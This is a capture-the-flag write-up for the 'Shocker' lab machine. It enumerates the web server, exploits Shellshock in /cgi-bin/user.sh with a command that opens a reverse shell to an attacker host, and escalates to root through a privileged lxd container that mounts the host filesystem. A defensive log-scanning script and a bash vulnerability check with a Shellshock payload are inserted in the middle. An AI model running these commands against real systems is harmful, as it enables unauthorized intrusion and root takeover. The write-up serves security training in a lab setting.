Shocker

An nmap scan reveals port 80 (Apache web server) and port 2222 (SSH).

A directory scan of the web server reveals /cgi-bin/:

> gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
<SNIP>
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
<SNIP>

A /cgi-bin/ directory typically indicates that the server is running Common Gateway Interface (CGI) scripts, which are used to generate dynamic content on the server.

Thus, the next step is to enumerate /cgi-bin/ with common script extensions such as .cgi, .sh and .pl:

gobuster dir -u http://10.10.10.56/cgi-bin/ -w 
<SNIP>
/.hta.sh              (Status: 403) [Size: 301]
/.htpasswd.pl         (Status: 403) [Size: 306]
/.htpasswd.sh         (Status: 403) [Size: 306]
/.htpasswd            (Status: 403) [Size: 303]
/.htpasswd.cgi        (Status: 403) [Size: 307]
/user.sh              (Status: 200) [Size: 119]

Here we discovered the script user.sh.

The guided mode tells me to look for an exploit from 2014, commonly known as Shellshock, and I did, and I found it. I don't know how the fuck I would have identified it if it didn't give me this hint. I really don't, but I looked at this hint and I fucking found it.

https://www.exploit-db.com/exploits/34900

python2 shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.12 lport=9001 pages=/cgi-bin/user.sh

Now I have a reverse shell.
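As an added defender-side example, not part of this writeup: the exploit above works because Apache's CGI handler exports request headers such as User-Agent and Referer into the environment of /cgi-bin/user.sh, where a vulnerable bash parses a "() { ... };" function definition. The same header is written verbatim into the access log, so a probe can be spotted after the fact; the script below scans combined-format Apache log lines (constructed samples, assumed format) for that pattern against CGI paths.

```python
import re

# Shellshock (CVE-2014-6271) abuses bash parsing a function definition,
# "() { ... };", out of any environment variable. mod_cgi exports request
# headers such as User-Agent and Referer as variables for /cgi-bin/ scripts,
# so a probe is written verbatim into the Apache access log.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format (assumed here):
# ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_combined(line):
    """Split one combined-format log line into fields; None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def is_shellshock_probe(entry):
    """True if any client-controlled field carries a bash function definition."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ("request", "referer", "agent"))

def find_probes(lines):
    """Return (client ip, request line) for each probe that reached a CGI path."""
    # Only requests handled by mod_cgi get their headers into bash's environment,
    # so a probe sent against a static page is parsed but not reported here.
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry and "/cgi-bin/" in entry["request"] and is_shellshock_probe(entry):
            hits.append((entry["ip"], entry["request"]))
    return hits

# Constructed sample log lines; not real traffic from the lab box.
SAMPLE_LOG = [
    '10.10.14.12 - - [18/Jan/2025:23:30:01 +0000] "GET /index.html HTTP/1.1" 200 137 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.12 - - [18/Jan/2025:23:30:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 '
    '"-" "() { :;}; echo probe"',
    '10.10.14.12 - - [18/Jan/2025:23:30:09 +0000] "GET /index.html HTTP/1.1" 200 137 '
    '"() { :;}; echo probe" "curl/7.88.1"',
]

if __name__ == "__main__":
    for ip, request in find_probes(SAMPLE_LOG):
        print(f"shellshock probe from {ip}: {request}")
```

On a live system the same patch-level check matters more than log review: a bash that prints only "test" for `env x='() { :;}; echo vulnerable' bash -c 'echo test'` is fixed.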

Upon inspecting id, I found that the user is in the lxd group.

Thus, we can leverage lxd for Linux privilege escalation.

First, transfer alpine.tar.gz to the target machine, then import the image:

shelly@Shocker:/tmp$ lxc image import alpine.tar.gz --alias alpine
Generating a client certificate. This may take a minute...
error: mkdir /.config: permission denied

That's fine; we can just do this. Setting HOME=/tmp lets lxc store its configuration in a writable directory:

shelly@Shocker:/tmp$ export HOME=/tmp
export HOME=/tmp
shelly@Shocker:~$ lxc image import alpine.tar.gz --alias alpine
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

Image imported with fingerprint: 5cfe4f7510aa3893f14e7cb0097d202d8b86ef71bf9731f68ee55e7e8808a541
shelly@Shocker:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |          UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| alpine | 5cfe4f7510aa | no     | alpine v3.18 (20230607_12:34) | x86_64 | 3.62MB | Jan 18, 2025 at 11:35pm (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
shelly@Shocker:~$ lxc init alpine r00t -c security.privileged=true
shelly@Shocker:~$ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
shelly@Shocker:~$ lxc start r00t
shelly@Shocker:/mnt$ lxc exec r00t /bin/sh
cd /mnt/root/root
cat root.txt